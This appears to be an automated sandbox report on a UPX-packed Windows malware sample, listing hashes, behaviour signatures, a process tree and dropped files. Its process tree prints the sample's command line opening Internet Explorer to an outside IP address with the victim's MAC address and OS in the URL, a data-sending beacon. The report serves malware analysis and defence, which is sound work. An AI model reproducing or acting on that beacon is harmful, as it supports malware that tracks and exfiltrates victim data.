Analysis

  • max time kernel
    185s
  • max time network
    198s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2022 18:09

General

  • Target

    c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe

  • Size

    143KB

  • MD5

    021dcfa7a9bc93f89ece268b3b0a71e8

  • SHA1

    1592e371e4ae9dda35eaf1bc107eca55efb71aea

  • SHA256

    c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627

  • SHA512

    44007a0e23d8ecde79d40481a8afcb000f3817f06854ab83e923e863a3d18d5198cc12c9d1ee40897ffa4429104d75d25456ac5c4fa71288cdef8163ab735de2

  • SSDEEP

    3072:MgN+Ns5uUdzh5vaBAzmeu2ZN3PRp6hIAsdxn6sM0TZMl9V:ZN+quUdzh5vaBAz5NZkhIAsdxn6sM0Tc

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe
    "C:\Users\Admin\AppData\Local\Temp\c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=ea-25-b6-f2-95-39&os=Microsoft Windows XP&flag=a6c815ea9033f67796aa256db98faf12&user=c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1536 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:432

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\3I1R361T.txt

    Filesize

    608B

    MD5

    75a20bd275e0fe7c10d6965811d08ed4

    SHA1

    a4932148cdf1cb676867c85693db4fdf57adf423

    SHA256

    cac64c157a5e2becee6ec9cc158a4a2266a4073e8d573429e8c7b5b9fddc243f

    SHA512

    159782a581dd097abb975b0a04b1dea28b86375ab818a997e0c74de9fc527861fe05d33d121dc18b803a3a93c22c9f353e8e0a3ae841b95be5357b768b43d860

  • memory/1732-54-0x0000000075521000-0x0000000075523000-memory.dmp

    Filesize

    8KB

  • memory/1732-55-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1732-56-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB